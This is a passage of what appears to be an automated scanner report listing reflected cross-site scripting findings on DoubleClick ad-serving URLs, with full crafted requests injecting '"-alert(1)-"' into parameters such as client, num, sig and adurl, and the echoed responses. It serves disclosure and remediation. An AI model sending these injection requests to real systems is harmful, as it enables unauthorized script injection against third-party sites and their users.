GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ%00962c0"-alert(1)-"a036383781d&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7005
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:14:19 GMT
Expires: Sat, 26 Mar 2011 13:14:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ%00962c0"-alert(1)-"a036383781d&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V100&promo=BCXXX03936");
var fscUrl = url;
va
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e67df"-alert(1)-"af922d3d5bf was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912e67df"-alert(1)-"af922d3d5bf&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7035
Date: Sat, 26 Mar 2011 13:14:48 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:48 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912e67df"-alert(1)-"af922d3d5bf&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V100%26promo%3DBCXXX03936");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a362b"-alert(1)-"c0a292ff252 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1a362b"-alert(1)-"c0a292ff252&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7004
Date: Sat, 26 Mar 2011 13:14:28 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:28 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
qLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1a362b"-alert(1)-"c0a292ff252&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP99C519S512N0B2A1D38E0000V109");
var fscUrl = url;
var fscUrlClickT
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c075c"-alert(1)-"98c9a8f876d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QAc075c"-alert(1)-"98c9a8f876d&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7074
Date: Sat, 26 Mar 2011 13:14:38 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:38 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QAc075c"-alert(1)-"98c9a8f876d&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e51"-alert(1)-"b2b22d2d3e9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc1e51"-alert(1)-"b2b22d2d3e9&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7040
Date: Sat, 26 Mar 2011 13:14:07 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:07 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/18b/%2a/b%3B234428571%3B0-0%3B0%3B50265527%3B3454-728/90%3B38431379/38449136/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc1e51"-alert(1)-"b2b22d2d3e9&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl
...[SNIP]...

5.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccbd9"-alert(1)-"b691060660c was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=ccbd9"-alert(1)-"b691060660c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6855
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 25 Mar 2011 19:17:44 GMT
Expires: Fri, 25 Mar 2011 19:17:44 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
zovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=ccbd9"-alert(1)-"b691060660chttp://learning.capella.edu/banners.aspx?revkey=151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

5.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ead3"-alert(1)-"0df83226a7e was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ8ead3"-alert(1)-"0df83226a7e&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:14:32 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:14:32 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
nAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ8ead3"-alert(1)-"0df83226a7e&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

5.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93684"-alert(1)-"04063d9d42c was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-406387893378091293684"-alert(1)-"04063d9d42c&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
